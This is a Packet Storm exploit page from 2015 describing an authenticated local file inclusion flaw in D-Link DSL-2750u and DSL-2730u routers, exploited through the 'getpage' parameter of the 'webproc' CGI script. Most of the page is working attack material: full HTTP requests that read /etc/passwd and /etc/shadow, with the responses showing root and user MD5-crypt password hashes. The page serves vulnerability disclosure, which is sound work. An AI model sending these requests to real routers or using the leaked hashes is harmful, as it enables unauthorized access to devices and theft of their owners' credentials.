exploit the possibilities

D-Link 2750u / 2730u Local File Disclosure

D-Link 2750u / 2730u Local File Disclosure
Posted Jul 8, 2015
Authored by Sathish Arthar

D-Link 2750u and 2730u suffer from a local file disclosure vulnerability.

tags | exploit, local, info disclosure
MD5 | 6c0f1291b0d937df656cfd3cb434865c

D-Link 2750u / 2730u Local File Disclosure

Change Mirror Download
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: Dlink Wireless Router Password File Access Exploit (Local File Inclusion)
#[+] Date: 07-07-2015
#[+] Platform: Hardware
#[+] Tested on: linux
#[+] Vendor: http://www.dlink.co.in
#[+] Product web page: http://www.dlink.co.in

#[+] Affected version:
DSL-2750u (firmware: IN_1.08 )
DSL-2730u (firmware: IN_1.02 )

#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)


#########################################################################
Dlink Wireless Router Password File Access Exploit
#########################################################################

Summary:

The Dlink DSL-2750u and DSL-2730u wireless router improves
your legacy Wireless-G network. It is a simple, secure way to share your
Internet connection and allows you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home and
small office.


Desc:

The router suffers from an authenticated file inclusion vulnerability
(LFI) when input passed thru the 'getpage' parameter to 'webproc' script is
not properly verified before being used to include files. This can be exploited
to include files from local resources.


Tested on: mini_httpd/1.19 19dec2003



===============================================================


GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/passwd HTTP/1.1

Host: 192.168.31.10

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: sessionid=2b48aa9b

Connection: keep-alive



HTTP/1.0 200 OK

Content-type: text/html

Pragma: no-cache

Cache-Control: no-cache

set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/



#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh


GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/shadow HTTP/1.1

Host: 192.168.31.10

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: sessionid=2b48aa9b

Connection: keep-alive


HTTP/1.0 200 OK

Content-type: text/html

Pragma: no-cache

Cache-Control: no-cache

set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/



#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    2 Files
  • 18
    Feb 18th
    27 Files
  • 19
    Feb 19th
    32 Files
  • 20
    Feb 20th
    15 Files
  • 21
    Feb 21st
    17 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close